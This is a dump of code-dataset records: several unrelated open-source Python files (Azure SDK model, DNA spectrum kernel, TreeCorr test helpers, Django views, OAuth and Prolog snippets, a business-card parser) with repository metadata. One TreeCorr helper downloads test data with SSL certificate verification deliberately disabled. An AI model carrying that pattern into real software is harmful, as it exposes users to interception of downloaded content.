    if len(sys.argv) != 2:
        print 'usage %s <tau0>'%sys.argv[0]
        sys.exit(1)
    np.random.seed(0)    # fixed seed for reproducible mini-batch sampling
    tune_rcv1(float(sys.argv[1]))
| 38,049 | -10 | 510 |
e024297cf1e1ea4f32ebd218843757ebd132b2de | 2,776 | py | Python | src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_request_base.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 2 | 2021-03-24T21:06:20.000Z | 2021-03-24T21:07:58.000Z | src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_request_base.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 3 | 2020-05-27T20:16:26.000Z | 2020-07-23T19:46:49.000Z | src/synapse/azext_synapse/vendored_sdks/azure_synapse/models/livy_request_base.py | Mannan2812/azure-cli-extensions | e2b34efe23795f6db9c59100534a40f0813c3d95 | [
"MIT"
] | 5 | 2020-05-09T17:47:09.000Z | 2020-10-01T19:52:06.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LivyRequestBase(Model):
    """LivyRequestBase.

    Request payload model whose field names (file/className/driverMemory/...)
    follow the Livy job-submission REST API. AutoRest-generated code:
    manual edits will be lost on regeneration (see file header).

    :param name:
    :type name: str
    :param file:
    :type file: str
    :param class_name:
    :type class_name: str
    :param args:
    :type args: list[str]
    :param jars:
    :type jars: list[str]
    :param files:
    :type files: list[str]
    :param archives:
    :type archives: list[str]
    :param conf:
    :type conf: dict[str, str]
    :param driver_memory:
    :type driver_memory: str
    :param driver_cores:
    :type driver_cores: int
    :param executor_memory:
    :type executor_memory: str
    :param executor_cores:
    :type executor_cores: int
    :param num_executors:
    :type num_executors: int
    """

    # Maps Python attribute name -> wire (JSON) key and msrest type used
    # by Model's serializer/deserializer.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'file': {'key': 'file', 'type': 'str'},
        'class_name': {'key': 'className', 'type': 'str'},
        'args': {'key': 'args', 'type': '[str]'},
        'jars': {'key': 'jars', 'type': '[str]'},
        'files': {'key': 'files', 'type': '[str]'},
        'archives': {'key': 'archives', 'type': '[str]'},
        'conf': {'key': 'conf', 'type': '{str}'},
        'driver_memory': {'key': 'driverMemory', 'type': 'str'},
        'driver_cores': {'key': 'driverCores', 'type': 'int'},
        'executor_memory': {'key': 'executorMemory', 'type': 'str'},
        'executor_cores': {'key': 'executorCores', 'type': 'int'},
        'num_executors': {'key': 'numExecutors', 'type': 'int'},
    }
| 36.051948 | 76 | 0.568084 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class LivyRequestBase(Model):
    """LivyRequestBase.

    Request payload model whose field names (file/className/driverMemory/...)
    follow the Livy job-submission REST API. AutoRest-generated code:
    manual edits will be lost on regeneration (see file header).

    :param name:
    :type name: str
    :param file:
    :type file: str
    :param class_name:
    :type class_name: str
    :param args:
    :type args: list[str]
    :param jars:
    :type jars: list[str]
    :param files:
    :type files: list[str]
    :param archives:
    :type archives: list[str]
    :param conf:
    :type conf: dict[str, str]
    :param driver_memory:
    :type driver_memory: str
    :param driver_cores:
    :type driver_cores: int
    :param executor_memory:
    :type executor_memory: str
    :param executor_cores:
    :type executor_cores: int
    :param num_executors:
    :type num_executors: int
    """

    # Maps Python attribute name -> wire (JSON) key and msrest type used
    # by Model's serializer/deserializer.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'file': {'key': 'file', 'type': 'str'},
        'class_name': {'key': 'className', 'type': 'str'},
        'args': {'key': 'args', 'type': '[str]'},
        'jars': {'key': 'jars', 'type': '[str]'},
        'files': {'key': 'files', 'type': '[str]'},
        'archives': {'key': 'archives', 'type': '[str]'},
        'conf': {'key': 'conf', 'type': '{str}'},
        'driver_memory': {'key': 'driverMemory', 'type': 'str'},
        'driver_cores': {'key': 'driverCores', 'type': 'int'},
        'executor_memory': {'key': 'executorMemory', 'type': 'str'},
        'executor_cores': {'key': 'executorCores', 'type': 'int'},
        'num_executors': {'key': 'numExecutors', 'type': 'int'},
    }

    def __init__(self, **kwargs):
        # AutoRest convention: every declared attribute is populated from
        # kwargs, defaulting to None when absent.
        super(LivyRequestBase, self).__init__(**kwargs)
        self.name = kwargs.get('name', None)
        self.file = kwargs.get('file', None)
        self.class_name = kwargs.get('class_name', None)
        self.args = kwargs.get('args', None)
        self.jars = kwargs.get('jars', None)
        self.files = kwargs.get('files', None)
        self.archives = kwargs.get('archives', None)
        self.conf = kwargs.get('conf', None)
        self.driver_memory = kwargs.get('driver_memory', None)
        self.driver_cores = kwargs.get('driver_cores', None)
        self.executor_memory = kwargs.get('executor_memory', None)
        self.executor_cores = kwargs.get('executor_cores', None)
        self.num_executors = kwargs.get('num_executors', None)
| 765 | 0 | 27 |
318dbd4cf83ca98be58a194a8c38e90476d92a30 | 2,498 | py | Python | kernel/spectrum.py | glothe/dna-prediction | e5aa45b1e552c7d22f2782928e9cbac1cfdd2222 | [
"MIT"
] | null | null | null | kernel/spectrum.py | glothe/dna-prediction | e5aa45b1e552c7d22f2782928e9cbac1cfdd2222 | [
"MIT"
] | null | null | null | kernel/spectrum.py | glothe/dna-prediction | e5aa45b1e552c7d22f2782928e9cbac1cfdd2222 | [
"MIT"
] | null | null | null | import functools
from collections import Counter
import numpy as np
from numba import njit
from numba.typed import Dict
from tqdm import tqdm
from kernel.utils import memoize_id, normalize_kernel
# Character -> character DNA complement map (A<->T, C<->G).
# NOTE(review): str.translate() requires an ordinal-keyed table
# (str.maketrans); passing this char-keyed dict directly to str.translate
# is a silent no-op.
TRANSLATION = {
    "A": "T",
    "T": "A",
    "C": "G",
    "G": "C"
}
@functools.lru_cache(None)
def complement(x: str):
    """Canonicalize a k-mer so it and its complement share one representative.

    Taking into account that the complement of a k-mer is supposed to be
    counted as the k-mer itself, projects upon the space of k-mers beginning
    either by 'A' or 'C'.
    e.g: ATAGCC == TATCGG
         complement("ATAGCC")="ATAGCC"
         complement("TATCGG")="ATAGCC"
    """
    if x[0] in "AC":
        return x
    # BUG FIX: str.translate() expects a table keyed by Unicode ordinals;
    # passing the char-keyed TRANSLATION dict directly is a silent no-op
    # (every lookup misses), so k-mers starting with T/G were never mapped.
    # str.maketrans converts the char->char dict into a proper table.
    return x.translate(str.maketrans(TRANSLATION))
@memoize_id
@functools.lru_cache(None) | 27.152174 | 103 | 0.548038 | import functools
from collections import Counter
import numpy as np
from numba import njit
from numba.typed import Dict
from tqdm import tqdm
from kernel.utils import memoize_id, normalize_kernel
# Character -> character DNA complement map (A<->T, C<->G).
# NOTE(review): str.translate() requires an ordinal-keyed table
# (str.maketrans); passing this char-keyed dict directly to str.translate
# is a silent no-op.
TRANSLATION = {
    "A": "T",
    "T": "A",
    "C": "G",
    "G": "C"
}
@functools.lru_cache(None)
def complement(x: str):
    """Canonicalize a k-mer so it and its complement share one representative.

    Taking into account that the complement of a k-mer is supposed to be
    counted as the k-mer itself, projects upon the space of k-mers beginning
    either by 'A' or 'C'.
    e.g: ATAGCC == TATCGG
         complement("ATAGCC")="ATAGCC"
         complement("TATCGG")="ATAGCC"
    """
    if x[0] in "AC":
        return x
    # BUG FIX: str.translate() expects a table keyed by Unicode ordinals;
    # passing the char-keyed TRANSLATION dict directly is a silent no-op
    # (every lookup misses), so k-mers starting with T/G were never mapped.
    # str.maketrans converts the char->char dict into a proper table.
    return x.translate(str.maketrans(TRANSLATION))
@memoize_id
def feature_vectors(X: np.ndarray, k: int):
    """Build one k-mer Counter per sequence in X.

    Each sequence x contributes a Counter over its canonicalized k-mers
    (complement() maps a k-mer and its complement to one representative).
    Returns a list of Counters, parallel to X.
    """
    return [
        Counter(complement(seq[start:start + k])
                for start in range(len(seq) - k + 1))
        for seq in X
    ]
@functools.lru_cache(None)
def spectrum_kernel(k: int = 4):
    """Return a (cached per k) function computing the normalized k-spectrum
    kernel between two sequence collections. The inner function is memoized
    by argument identity, and exploits symmetry when X0 is X1.
    """
    @memoize_id
    def spectrum_kernel_inner(X0: np.ndarray, X1: np.ndarray):
        # Identity check (not equality): the symmetric fast path is only
        # taken when both arguments are literally the same object.
        symmetric = X0 is X1
        n0 = len(X0)
        X0_dict = feature_vectors(X0, k)
        if symmetric:
            K = np.zeros(shape=(n0, n0))
            # Compute sparse dot product
            for i in tqdm(range(n0), desc=f"Spectrum kernel (k={k})"):
                X0i = X0_dict[i]
                for j in range(i, n0):
                    X0j = X0_dict[j]
                    # Counter returns 0 for missing k-mers, so iterating the
                    # (sparse) keys of X0i suffices for the dot product.
                    K[i, j] = sum(count * X0j[substr] for substr, count in X0i.items())
                    K[j, i] = K[i, j]
            return normalize_kernel(K)
        else:
            n1 = len(X1)
            X1_dict = feature_vectors(X1, k)
            K = np.zeros(shape=(n0, n1))
            # Compute sparse dot product
            for i in tqdm(range(n0), desc=f"Spectrum kernel (k={k})"):
                X0i = X0_dict[i]
                for j in range(n1):
                    X1j = X1_dict[j]
                    K[i, j] = sum(count * X1j[substr] for substr, count in X0i.items())
            # Computes K(x, x) and K(y, y) for normalization
            rows = np.zeros(shape=n0)
            for i in range(n0):
                rows[i] = sum(count ** 2 for count in X0_dict[i].values())
            columns = np.zeros(shape=n1)
            for j in range(n1):
                columns[j] = sum(count ** 2 for count in X1_dict[j].values())
            return normalize_kernel(K, rows=rows, columns=columns)
    return spectrum_kernel_inner
eae98172e8895a24f8d31ce413ff2889797337bb | 8,087 | py | Python | tests/test_helper.py | zchvsre/TreeCorr | 825dc0a9d4754f9d98ebcf9c26dee9597915d650 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test_helper.py | zchvsre/TreeCorr | 825dc0a9d4754f9d98ebcf9c26dee9597915d650 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | tests/test_helper.py | zchvsre/TreeCorr | 825dc0a9d4754f9d98ebcf9c26dee9597915d650 | [
"BSD-2-Clause-FreeBSD"
] | 1 | 2020-12-14T16:23:33.000Z | 2020-12-14T16:23:33.000Z | # Copyright (c) 2003-2019 by Mike Jarvis
#
# TreeCorr is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
from __future__ import print_function
import logging
import sys
import os
def get_from_wiki(file_name):
    """We host some larger files used for the test suite separately on the TreeCorr wiki repo
    so people don't need to download them with the code when checking out the repo.
    Most people don't run the tests after all.

    Downloads ``file_name`` into ``data/<file_name>`` unless it already
    exists. Network I/O; SSL verification is deliberately skipped (see below);
    no checksum validation is performed.
    """
    local_file_name = os.path.join('data',file_name)
    url = 'https://github.com/rmjarvis/TreeCorr/wiki/' + file_name
    if not os.path.isfile(local_file_name):
        # Python 3 / Python 2 import fallback.
        try:
            from urllib.request import urlopen
        except ImportError:
            from urllib import urlopen
        import shutil
        print('downloading %s from %s...'%(local_file_name,url))
        # urllib.request.urlretrieve(url,local_file_name)
        # The above line doesn't work very well with the SSL certificate that github puts on it.
        # It works fine in a web browser, but on my laptop I get:
        # urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:600)>
        # The solution is to open a context that doesn't do ssl verification.
        # But that can only be done with urlopen, not urlretrieve. So, here is the solution.
        # cf. http://stackoverflow.com/questions/7243750/download-file-from-web-in-python-3
        #     http://stackoverflow.com/questions/27835619/ssl-certificate-verify-failed-error
        try:
            import ssl
            context = ssl._create_unverified_context()
            u = urlopen(url, context=context)
        except (AttributeError, TypeError):
            # Note: prior to 2.7.9, there is no such function or even the context keyword.
            u = urlopen(url)
        with open(local_file_name, 'wb') as out:
            shutil.copyfileobj(u, out)
        u.close()
        print('done.')
def which(program):
    """
    Mimic functionality of unix which command.

    Returns the full path of ``program`` if it is an executable file (either
    given with a directory component, or found on $PATH), else None.
    On Windows, '.exe' is appended when missing.
    """
    # BUG FIX: is_exe was referenced but not defined in this copy, making
    # every call raise NameError. Restored as a local helper.
    def is_exe(fpath):
        # A candidate must be an existing regular file with the execute bit set.
        return os.path.isfile(fpath) and os.access(fpath, os.X_OK)

    if sys.platform == "win32" and not program.endswith(".exe"):
        program += ".exe"
    fpath, fname = os.path.split(program)
    if fpath:
        if is_exe(program):
            return program
    else:
        for path in os.environ["PATH"].split(os.pathsep):
            exe_file = os.path.join(path, program)
            if is_exe(exe_file):
                return exe_file
    return None
def get_script_name(file_name):
    """
    Check if the file_name is in the path.  If not, prepend appropriate path to it.
    """
    if which(file_name) is not None:
        return file_name
    # Not on $PATH: fall back to <repo_root>/scripts/<file_name>, located
    # relative to this test file.
    tests_dir = os.path.split(os.path.realpath(__file__))[0]
    repo_root = os.path.split(tests_dir)[0]
    candidate = os.path.join(repo_root, 'scripts', file_name)
    print('Warning: The script %s is not in the path.'%file_name)
    print(' Using explcit path for the test:',candidate)
    return candidate
class CaptureLog(object):
    """A context manager that saves logging output into a string that is accessible for
    checking in unit tests.

    After exiting the context, the attribute `output` will have the logging output.

    Sample usage:

            >>> with CaptureLog() as cl:
            ...     cl.logger.info('Do some stuff')
            >>> assert cl.output == 'Do some stuff'

    """
    # BUG FIX: the class body contained only this docstring, so the
    # documented .logger / .output / context-manager API did not exist.
    def __init__(self, level=3):
        # Map the 0-3 verbosity convention onto logging levels.
        logging_levels = { 0: logging.CRITICAL,
                           1: logging.WARNING,
                           2: logging.INFO,
                           3: logging.DEBUG }
        self.logger = logging.getLogger('CaptureLog')
        self.logger.setLevel(logging_levels[level])
        try:
            from StringIO import StringIO
        except ImportError:
            from io import StringIO
        self.stream = StringIO()
        self.handler = logging.StreamHandler(self.stream)
        self.logger.addHandler(self.handler)

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        # Capture everything written so far, stripped of trailing newline.
        self.handler.flush()
        self.output = self.stream.getvalue().strip()
        self.handler.close()
# Replicate a small part of the nose package to get the `assert_raises` function/context-manager
# without relying on nose as a dependency.
# BUG FIX: this copy referenced an undefined `Dummy` and left a dangling
# @contextmanager with no function, which is a SyntaxError. Restored the
# Dummy TestCase and the assert_warns implementations.
import unittest

class Dummy(unittest.TestCase):
    # A TestCase needs a named test method to be instantiable; never run.
    def nop():
        pass
_t = Dummy('nop')

# Bound method borrowed from unittest: usable as function or context manager.
assert_raises = getattr(_t, 'assertRaises')

#if sys.version_info > (3,2):
if False:
    # Note: this should work, but at least sometimes it fails with:
    #    RuntimeError: dictionary changed size during iteration
    # cf. https://bugs.python.org/issue29620
    # So just use our own (working) implementation for all Python versions.
    assert_warns = getattr(_t, 'assertWarns')
else:
    from contextlib import contextmanager
    import warnings

    @contextmanager
    def assert_warns_context(wtype):
        """Assert that the with-body raises a warning of type wtype."""
        # When used as a context manager
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            yield w
        assert len(w) >= 1, "Expected warning %s was not raised."%(wtype)
        assert issubclass(w[0].category, wtype), \
            "Warning raised was the wrong type (got %s, expected %s)"%(
            w[0].category, wtype)

    def assert_warns(wtype, *args, **kwargs):
        """assert_warns(wtype) -> context manager;
        assert_warns(wtype, func, *a, **k) -> call func, requiring the warning."""
        if len(args) == 0:
            return assert_warns_context(wtype)
        else:
            # When used as a regular function
            func = args[0]
            args = args[1:]
            with assert_warns(wtype):
                res = func(*args, **kwargs)
            return res

del Dummy
del _t
# Context to make it easier to profile bits of the code
def do_pickle(obj1, func = lambda x : x):
    """Check that the object is picklable.  Also that it has basic == and != functionality.
    """
    try:
        import cPickle as pickle
    except:
        import pickle
    import copy
    print('Try pickling ',str(obj1))

    # Round-trip through pickle must produce a distinct but equivalent object.
    clone = pickle.loads(pickle.dumps(obj1))
    assert clone is not obj1
    baseline = func(obj1)
    assert baseline == func(clone)

    # Check that == works properly if the other thing isn't the same type.
    assert baseline != object()
    assert object() != baseline

    # Shallow and deep copies must also compare equal under func.
    shallow = copy.copy(obj1)
    assert shallow is not obj1
    assert func(shallow) == baseline

    deep = copy.deepcopy(obj1)
    assert deep is not obj1
    assert func(deep) == baseline
| 33.83682 | 120 | 0.629034 | # Copyright (c) 2003-2019 by Mike Jarvis
#
# TreeCorr is free software: redistribution and use in source and binary forms,
# with or without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions, and the disclaimer given in the accompanying LICENSE
# file.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the disclaimer given in the documentation
# and/or other materials provided with the distribution.
from __future__ import print_function
import logging
import sys
import os
def get_from_wiki(file_name):
    """We host some larger files used for the test suite separately on the TreeCorr wiki repo
    so people don't need to download them with the code when checking out the repo.
    Most people don't run the tests after all.

    Downloads ``file_name`` into ``data/<file_name>`` unless it already
    exists. Network I/O; SSL verification is deliberately skipped (see below);
    no checksum validation is performed.
    """
    local_file_name = os.path.join('data',file_name)
    url = 'https://github.com/rmjarvis/TreeCorr/wiki/' + file_name
    if not os.path.isfile(local_file_name):
        # Python 3 / Python 2 import fallback.
        try:
            from urllib.request import urlopen
        except ImportError:
            from urllib import urlopen
        import shutil
        print('downloading %s from %s...'%(local_file_name,url))
        # urllib.request.urlretrieve(url,local_file_name)
        # The above line doesn't work very well with the SSL certificate that github puts on it.
        # It works fine in a web browser, but on my laptop I get:
        # urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:600)>
        # The solution is to open a context that doesn't do ssl verification.
        # But that can only be done with urlopen, not urlretrieve. So, here is the solution.
        # cf. http://stackoverflow.com/questions/7243750/download-file-from-web-in-python-3
        #     http://stackoverflow.com/questions/27835619/ssl-certificate-verify-failed-error
        try:
            import ssl
            context = ssl._create_unverified_context()
            u = urlopen(url, context=context)
        except (AttributeError, TypeError):
            # Note: prior to 2.7.9, there is no such function or even the context keyword.
            u = urlopen(url)
        with open(local_file_name, 'wb') as out:
            shutil.copyfileobj(u, out)
        u.close()
        print('done.')
def which(program):
    """
    Mimic functionality of unix which command.

    Return the full path to ``program`` if it is executable (either given
    with a directory component, or found on $PATH), else None. On Windows,
    '.exe' is appended when missing.
    """
    def is_exe(candidate):
        # An executable is an existing regular file with the execute bit set.
        return os.path.isfile(candidate) and os.access(candidate, os.X_OK)

    if sys.platform == "win32" and not program.endswith(".exe"):
        program += ".exe"

    directory, _basename = os.path.split(program)
    if directory:
        # Explicit path given: accept it only if it is executable as-is.
        if is_exe(program):
            return program
        return None

    # Bare name: scan every $PATH entry for an executable candidate.
    for path_dir in os.environ["PATH"].split(os.pathsep):
        candidate = os.path.join(path_dir, program)
        if is_exe(candidate):
            return candidate
    return None
def get_script_name(file_name):
    """
    Check if the file_name is in the path.  If not, prepend appropriate path to it.

    Fallback location is <repo_root>/scripts/<file_name>, computed relative
    to this test file (tests/ is assumed to sit directly under the root).
    """
    if which(file_name) is not None:
        return file_name
    else:
        test_dir = os.path.split(os.path.realpath(__file__))[0]
        root_dir = os.path.split(test_dir)[0]
        script_dir = os.path.join(root_dir, 'scripts')
        exe_file_name = os.path.join(script_dir, file_name)
        print('Warning: The script %s is not in the path.'%file_name)
        print(' Using explcit path for the test:',exe_file_name)
        return exe_file_name
def timer(f):
    """Decorator that prints the wall-clock time taken by each call to f."""
    import functools

    @functools.wraps(f)
    def timed(*args, **kwargs):
        import time
        start = time.time()
        result = f(*args, **kwargs)
        elapsed = time.time() - start
        # repr(f) looks like '<function name at 0x...>'; token 1 is the name.
        fname = repr(f).split()[1]
        print('time for %s = %.2f' % (fname, elapsed))
        return result
    return timed
class CaptureLog(object):
    """A context manager that saves logging output into a string that is accessible for
    checking in unit tests.

    After exiting the context, the attribute `output` will have the logging output.

    Sample usage:

            >>> with CaptureLog() as cl:
            ...     cl.logger.info('Do some stuff')
            >>> assert cl.output == 'Do some stuff'

    """
    def __init__(self, level=3):
        # Translate the 0-3 verbosity convention into logging levels.
        verbosity_map = { 0: logging.CRITICAL,
                          1: logging.WARNING,
                          2: logging.INFO,
                          3: logging.DEBUG }
        self.logger = logging.getLogger('CaptureLog')
        self.logger.setLevel(verbosity_map[level])
        # Python 2 / Python 3 StringIO fallback, as elsewhere in this file.
        try:
            from StringIO import StringIO
        except ImportError:
            from io import StringIO
        self.stream = StringIO()
        self.handler = logging.StreamHandler(self.stream)
        self.logger.addHandler(self.handler)

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.handler.flush()
        # Strip the trailing newline the handler appends to each record.
        self.output = self.stream.getvalue().strip()
        self.handler.close()
# Replicate a small part of the nose package to get the `assert_raises` function/context-manager
# without relying on nose as a dependency.
import unittest

class Dummy(unittest.TestCase):
    # A TestCase needs a named test method to be instantiable; never run.
    def nop():
        pass
_t = Dummy('nop')

# Bound method borrowed from unittest: usable as function or context manager.
assert_raises = getattr(_t, 'assertRaises')

#if sys.version_info > (3,2):
if False:
    # Note: this should work, but at least sometimes it fails with:
    #    RuntimeError: dictionary changed size during iteration
    # cf. https://bugs.python.org/issue29620
    # So just use our own (working) implementation for all Python versions.
    assert_warns = getattr(_t, 'assertWarns')
else:
    from contextlib import contextmanager
    import warnings

    @contextmanager
    def assert_warns_context(wtype):
        """Assert that the with-body raises a warning of type wtype."""
        # When used as a context manager
        with warnings.catch_warnings(record=True) as w:
            warnings.simplefilter("always")
            yield w
        assert len(w) >= 1, "Expected warning %s was not raised."%(wtype)
        assert issubclass(w[0].category, wtype), \
            "Warning raised was the wrong type (got %s, expected %s)"%(
            w[0].category, wtype)

    def assert_warns(wtype, *args, **kwargs):
        """assert_warns(wtype) -> context manager;
        assert_warns(wtype, func, *a, **k) -> call func, requiring the warning."""
        if len(args) == 0:
            return assert_warns_context(wtype)
        else:
            # When used as a regular function
            func = args[0]
            args = args[1:]
            with assert_warns(wtype):
                res = func(*args, **kwargs)
            return res

del Dummy
del _t
# Context to make it easier to profile bits of the code
class profile(object):
    """Context manager that cProfiles its body and prints the hottest
    ``nlines`` entries (sorted by ``sortby``) on exit."""
    def __init__(self, sortby='tottime', nlines=30):
        self.sortby = sortby
        self.nlines = nlines

    def __enter__(self):
        import cProfile, pstats
        self.pr = cProfile.Profile()
        self.pr.enable()
        return self

    def __exit__(self, type, value, traceback):
        import pstats
        self.pr.disable()
        stats = pstats.Stats(self.pr).sort_stats(self.sortby)
        stats.print_stats(self.nlines)
def do_pickle(obj1, func = lambda x : x):
    """Check that the object is picklable.  Also that it has basic == and != functionality.

    ``func`` optionally projects each copy before comparison (identity by
    default). Exercises pickle round-trip, copy.copy and copy.deepcopy, and
    checks that == / != against a foreign type behave sanely.
    """
    try:
        import cPickle as pickle
    except:
        import pickle
    import copy
    print('Try pickling ',str(obj1))

    #print('pickled obj1 = ',pickle.dumps(obj1))
    obj2 = pickle.loads(pickle.dumps(obj1))
    assert obj2 is not obj1    # round trip must yield a distinct object
    #print('obj1 = ',repr(obj1))
    #print('obj2 = ',repr(obj2))
    f1 = func(obj1)
    f2 = func(obj2)
    #print('func(obj1) = ',repr(f1))
    #print('func(obj2) = ',repr(f2))
    assert f1 == f2

    # Check that == works properly if the other thing isn't the same type.
    assert f1 != object()
    assert object() != f1

    obj3 = copy.copy(obj1)
    assert obj3 is not obj1
    f3 = func(obj3)
    assert f3 == f1

    obj4 = copy.deepcopy(obj1)
    assert obj4 is not obj1
    f4 = func(obj4)
    assert f4 == f1
| 2,156 | 11 | 332 |
365807fa799c620482b02b59ad08f208daa23081 | 671 | py | Python | backend/api/views.py | 50Bytes-dev/vue-test | de1f1aeaabf16d93ee5ba6f0115ef43cb5c0be7b | [
"MIT"
] | null | null | null | backend/api/views.py | 50Bytes-dev/vue-test | de1f1aeaabf16d93ee5ba6f0115ef43cb5c0be7b | [
"MIT"
] | 13 | 2020-01-05T09:01:03.000Z | 2022-02-26T22:01:35.000Z | backend/api/views.py | 50Bytes-dev/vue-test | de1f1aeaabf16d93ee5ba6f0115ef43cb5c0be7b | [
"MIT"
] | null | null | null | from django.views.generic import TemplateView
from django.views.decorators.cache import never_cache
from rest_framework import viewsets
from .models import *
# Serve Vue Application
index_view = never_cache(TemplateView.as_view(template_name='index.html'))
class PostViewSet(viewsets.ModelViewSet):
    """
    API endpoint for Posts, allowing them to be viewed, edited, etc.
    """
    # prefetch_related avoids an extra query per post when serializing photos.
    queryset = Post.objects.prefetch_related('photos').all()
    serializer_class = PostSerializer
class PhotoViewSet(viewsets.ModelViewSet):
    """
    API endpoint for Photos, allowing them to be viewed, edited, etc.
    """
    queryset = Photo.objects.all()
    serializer_class = PhotoSerializer
| 26.84 | 74 | 0.752608 | from django.views.generic import TemplateView
from django.views.decorators.cache import never_cache
from rest_framework import viewsets
from .models import *
# Serve Vue Application
index_view = never_cache(TemplateView.as_view(template_name='index.html'))
class PostViewSet(viewsets.ModelViewSet):
    """
    API endpoint for Posts, allowing them to be viewed, edited, etc.
    """
    # prefetch_related avoids an extra query per post when serializing photos.
    queryset = Post.objects.prefetch_related('photos').all()
    serializer_class = PostSerializer
class PhotoViewSet(viewsets.ModelViewSet):
    """
    API endpoint for Photos, allowing them to be viewed, edited, etc.
    """
    queryset = Photo.objects.all()
    serializer_class = PhotoSerializer
| 0 | 0 | 0 |
fced81d859b616ac0980e3c8bdc82ecefdbdff0e | 333 | py | Python | src/socialite/oauth/github.py | garzola/masonite-socialite | 70cb80365e2096773e291f84b6e7af81a276ac1b | [
"MIT"
] | 13 | 2020-02-02T01:27:51.000Z | 2021-11-08T08:50:57.000Z | src/socialite/oauth/github.py | garzola/masonite-socialite | 70cb80365e2096773e291f84b6e7af81a276ac1b | [
"MIT"
] | 17 | 2020-02-05T16:52:45.000Z | 2021-05-16T14:34:46.000Z | src/socialite/oauth/github.py | garzola/masonite-socialite | 70cb80365e2096773e291f84b6e7af81a276ac1b | [
"MIT"
] | 6 | 2020-02-03T14:20:30.000Z | 2021-03-18T01:33:21.000Z | from socialite.helpers import get_config
from .base import BaseOAuth2
| 30.272727 | 66 | 0.732733 | from socialite.helpers import get_config
from .base import BaseOAuth2
class GithubAPI(object):
    """Minimal GitHub client: an OAuth2 session pointed at api.github.com."""
    def __init__(self, token, **kwargs):
        # token: existing OAuth token accepted by BaseOAuth2.
        # kwargs are accepted but currently unused -- TODO confirm intent.
        client_id = get_config('socialite.SOCIAL_AUTH_GITHUB_KEY')
        self.oauth_session = BaseOAuth2(client_id, token=token)
        self.oauth_session.BASE_URL = 'https://api.github.com'
| 209 | 3 | 50 |
0c9d7da300296569dd584e6d10e28c99acc205a9 | 535 | py | Python | src/main/python/helloworld.py | martinchapman/tmrweb | 7dbf699d815ac198948778ad9b9fbd371d17c1b3 | [
"MIT"
] | 2 | 2020-09-21T07:53:10.000Z | 2021-07-16T19:36:06.000Z | src/main/python/helloworld.py | martinchapman/tmrweb | 7dbf699d815ac198948778ad9b9fbd371d17c1b3 | [
"MIT"
] | 1 | 2021-08-31T22:25:33.000Z | 2021-08-31T22:25:33.000Z | src/main/python/helloworld.py | martinchapman/tmrweb | 7dbf699d815ac198948778ad9b9fbd371d17c1b3 | [
"MIT"
] | 4 | 2020-05-01T13:08:58.000Z | 2020-05-04T15:07:50.000Z | import sys
from pyswip import Prolog
helloworld(); | 41.153846 | 228 | 0.700935 | import sys
from pyswip import Prolog
def helloworld():
prolog = Prolog();
prolog.assertz("use_module(library(semweb/turtle))");
prolog.assertz("use_module(library(semweb/rdf_http_plugin))");
prolog.assertz("use_module(library(semweb/rdf_db))");
for soln in prolog.query("rdf_load('https://www.dropbox.com/s/33v1zze5fpbmnzh/model.ttl?raw=1', [format('turtle'), register_namespaces(false), base_uri('http://anonymous.org/vocab/'), graph('http://anonymous.org/vocab')])"):
print(soln);
helloworld(); | 457 | 0 | 23 |
883871dac04a34651083669b83444bfa65ba822f | 4,492 | py | Python | BusinessCardParser/BusinessCardParser.py | dariangarcia-404/breezy-palm-tree | 4c6403addda32209799fb84be97f1008b823f28f | [
"MIT"
] | null | null | null | BusinessCardParser/BusinessCardParser.py | dariangarcia-404/breezy-palm-tree | 4c6403addda32209799fb84be97f1008b823f28f | [
"MIT"
] | null | null | null | BusinessCardParser/BusinessCardParser.py | dariangarcia-404/breezy-palm-tree | 4c6403addda32209799fb84be97f1008b823f28f | [
"MIT"
] | null | null | null | import spacy
import ContactInfo
DIVIDER = "~" # CONSTANT which defines dividing str between card entries in a file
class BusinessCardParser:
""" Function getContactInfo
Input(s): document with text from one business card (string).
Output(s): A (ContactInfo) object that contains vital information about the card owner.
Description: Where the magic happens. Calls methods that identify vital info.
"""
""" Function isName
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a name, else false (boolean).
Runtime: > O(m), m = characters in entry. Takes long b/c of NLP machine learning
"""
""" Function isPhone
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a phone, else false (boolean).
Runtime: O(2m) => O(m), m = characters in entry
"""
""" Function isEmail
Input(s): an entry (string) from a business card string
Output(s): a (string) if it is a email, else false (boolean).
Runtime: O(2m) => O(m), m = characters in entry
"""
""" Function starter
* does the heavy lifting (I/O, calling methods)
